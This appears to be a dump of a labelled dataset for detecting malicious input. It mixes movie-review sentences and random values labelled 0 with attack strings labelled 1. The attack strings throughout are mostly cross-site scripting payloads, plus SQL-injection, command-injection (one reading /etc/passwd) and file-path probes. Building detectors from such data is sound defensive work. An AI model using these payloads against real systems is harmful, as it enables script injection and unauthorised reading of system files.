stringlengths 1
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int64 0
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int64 1
The Trinity Assembly approaches the endeavor with a shocking lack of irony, and George Ratliff's documentary, Hell House, reflects their earnestness -- which makes for a terrifying film. | 0 | 16,492 |
<u onbeforescriptexecute=alert(1)><script>1</script> | 1 | 10,762 |
Heartwarming here relies less on forced air than on Petter N忙ss' delicate, clever direction ... and a wonderful, imaginative script by Axel Hellstenius. | 0 | 17,357 |
9.29027E+11 | 0 | 25,793 |
<em onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</em><input value=clickme> | 1 | 4,972 |
<style>@keyframes slidein {}</style><dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dfn> | 1 | 9,045 |
"`'><script>\x3Bjavascript:alert(1400)</script> | 1 | 12,632 |
... a preachy parable stylized with a touch of John Woo bullet ballet. | 0 | 23,636 |
Well-written, nicely acted and beautifully shot and scored, the film works on several levels, openly questioning social mores while ensnaring the audience with its emotional pull. | 0 | 14,633 |
<animatemotion onpointermove=alert(1) style=display:block>XSS</animatemotion> | 1 | 3,062 |
<video onpointermove=alert(1) style=display:block>XSS</video> | 1 | 10,930 |
0.645695888 | 0 | 27,322 |
The film has the high-buffed gloss and high-octane jolts you expect of De Palma, but what makes it transporting is that it's also one of the smartest, most pleasurable expressions of pure movie love to come from an American director in years. | 0 | 19,278 |
<mark onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></mark> | 1 | 6,550 |
If you liked such movies as Notting Hill, Four Weddings And A Funeral, Bridget Jones' Diary or High Fidelity, then you won't want to miss About A Boy. | 0 | 14,557 |
... Blade II is more enjoyable than the original. | 0 | 15,067 |
A slow-moving police-procedural thriller that takes its title all too literally. | 0 | 24,095 |
javascript:alert%281%29; | 1 | 13,307 |
<IMG SRC="livescript:[code]"> | 1 | 636 |
0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search | 1 | 12,095 |
* Debug mode: off | 0 | 28,903 |
<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=print()></textarea> | 1 | 8,497 |
<SCRIPT a=`>` SRC=""></SCRIPT> | 1 | 13,297 |
<map onmousewheel=alert(1) style=display:block>requires scrolling | 1 | 6,499 |
This movie feel more like a non-stop cry for attention, than an attempt at any kind of satisfying entertainment. | 0 | 20,440 |
<STYLE. TYPE="text/javascript">alert(262);</STYLE> | 1 | 11,501 |
<noembed oncontextmenu="alert(1)" style=display:block>test</noembed> | 1 | 6,938 |
<input3 onmouseleave="alert(1)" style=display:block>test</input3> | 1 | 6,048 |
<div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable style=display:block>drop here</keygen> | 1 | 4,636 |
0.946754062 | 0 | 27,748 |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | 1 | 1,640 |
<input2 onmousemove="alert(1)" style=display:block>test</input2> | 1 | 6,013 |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | 1 | 387 |
One of the very best movies ever made about the life of moviemaking. | 0 | 17,009 |
8.76264E+11 | 0 | 26,454 |
Some people march to the beat of a different drum, and if you ever wondered what kind of houses those people live in, this documentary takes a look at 5 alternative housing options. | 0 | 18,211 |
3.59486E+11 | 0 | 26,590 |
|echo dstbto$()\ wwbeeq\nz^xyu||a #' |echo dstbto$()\ wwbeeq\nz^xyu||a #|" |echo dstbto$()\ wwbeeq\nz^xyu||a # | 1 | 14,001 |
vVNP7l82 | 0 | 25,206 |
We get light showers of emotion a couple of times, but then -- strangely -- these wane to an inconsistent and ultimately unsatisfying drizzle. | 0 | 23,421 |
3.50454E+11 | 0 | 25,934 |
A decent-enough nail-biter that stands a good chance of being the big hit Franklin needs to stay afloat in Hollywood. | 0 | 16,531 |
Whatever one makes of its political edge, this is beautiful filmmaking from one of French cinema's master craftsmen. | 0 | 17,150 |
0.073239091 | 0 | 27,458 |
0.223836442 | 0 | 27,918 |
<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote> | 1 | 3,572 |
<marquee ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</marquee> | 1 | 6,569 |
<label onmousedown="alert(1)" style=display:block>test</label> | 1 | 6,247 |
I didn't laugh. I didn't smile. I survived. | 0 | 24,547 |
JjyWEqsp | 0 | 25,515 |
'"></title><script>alert(1779)</script>><marquee><h1>XSS by xss</h1></marquee> | 1 | 13,010 |
Byler reveals his characters in a way that intrigues and even fascinates us, and he never reduces the situation to simple melodrama. | 0 | 15,322 |
file:///d:\Windows\system.ini | 1 | 13,751 |
Barney has created a tour de force that is weird, wacky and wonderful. | 0 | 14,916 |
<svg><a xmlns:xlink= xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(220) to=%26> | 1 | 11,467 |
When it comes to the battle of Hollywood vs. Woo, it looks like Woo's a P.O.W. | 0 | 23,090 |
<dd oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test | 1 | 4,252 |
<style onmousewheel=alert(1) style=display:block>requires scrolling | 1 | 8,350 |
<x contenteditable onblur=alert(155)>lose focus! | 1 | 11,411 |
<var onbeforescriptexecute=alert(1)><script>1</script> | 1 | 10,844 |
It's excessively quirky and a little underconfident in its delivery, but otherwise this is the best 'old neighborhood' project since Christopher Walken kinda romanced Cyndi Lauper in The Opportunists. | 0 | 18,555 |
Too ordinary to restore (Harmon) to prominence, despite some creepy scenes that evoke childish night terrors, and a praiseworthy attempt to generate suspense rather than gross out the audience. | 0 | 19,940 |
A porn film without the sex scenes. | 0 | 24,042 |
Nicks, seemingly uncertain what's going to make people laugh, runs the gamut from stale parody to raunchy sex gags to formula romantic comedy. | 0 | 20,802 |
<marquee onmousewheel=alert(1) style=display:block>requires scrolling | 1 | 6,581 |
<div onmouseenter="alert(1)" style=display:block>test</div> | 1 | 4,813 |
<applet onpointerleave=alert(1) style=display:block>XSS</applet> | 1 | 3,138 |
<style>@keyframes x{}</style><datalist style="animation-name:x" onwebkitanimationstart="alert(1)"></datalist> | 1 | 9,564 |
a'&cat$j $j/etc$j/passwd | 1 | 13,910 |
0.609512824 | 0 | 27,099 |
<style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></label> | 1 | 9,122 |
<SCRIPT a=">" SRC=""></SCRIPT> | 1 | 2,076 |
<audio onpointerrawupdate=alert(1) style=display:block>XSS</audio> | 1 | 3,320 |
This harrowing journey into combat hell vividly captures the chaotic insanity and personal tragedies that are all too abundant when human hatred spews forth unchecked. | 0 | 18,809 |
Nothing but one relentlessly depressing situation after another for its entire running time, something that you could easily be dealing with right now in your lives. | 0 | 19,702 |
<bdo onpointerout=alert(1) style=display:block>XSS</bdo> | 1 | 3,478 |
<menuitem onpointerup=alert(1) style=display:block>XSS</menuitem> | 1 | 6,675 |
SELECT * FROM information_schema.tables WHERE 1=1 AND Polygon((select 1 from (select * from ({payload})a)b)) | 1 | 14,175 |
A winning piece of work filled with love for the movies of the 1960s. | 0 | 16,148 |
Opens as promising as any war/adventure film you'll ever see and dissolves into a routine courtroom drama, better suited for a movie titled ``Glory: A Soldier's Story.'' | 0 | 21,703 |
0.187264965 | 0 | 27,690 |
<html ontouchmove=alert(1)> | 1 | 11,289 |
<img src=x\x09onerror="javascript:alert(620)"> | 1 | 11,852 |
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0.087088707 | 0 | 27,587 |
"`'><script>\x3Bjavascript:alert(1)</script> | 1 | 347 |
'Anyone with a passion for cinema, and indeed sex, should see it as soon as possible.' | 0 | 17,525 |
<optgroup onkeyup="alert(1)" contenteditable style=display:block>test</optgroup> | 1 | 7,152 |
Montias ... pumps a lot of energy into his nicely nuanced narrative and surrounds himself with a cast of quirky -- but not stereotyped -- street characters. | 0 | 15,352 |
<th onbeforecopy="alert(1)" contenteditable>test</th> | 1 | 10,473 |
klYi37rV | 0 | 25,602 |
<content onmousewheel=alert(1) style=display:block>requires scrolling | 1 | 4,107 |
Though there's a clarity of purpose and even-handedness to the film's direction, the drama feels rigged and sluggish. | 0 | 24,358 |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | 1 | 13,275 |
kpUowitd | 0 | 24,971 |
<body onhelp=alert(1)>press F1! | 1 | 11,298 |
<style>@keyframes slidein {}</style><abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></abbr> | 1 | 8,973 |
<style>@keyframes x{}</style><header style="animation-name:x" onwebkitanimationend="alert(1)"></header> | 1 | 9,655 |
0.644902222 | 0 | 28,660 |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | 1 | 432 |
Subsets and Splits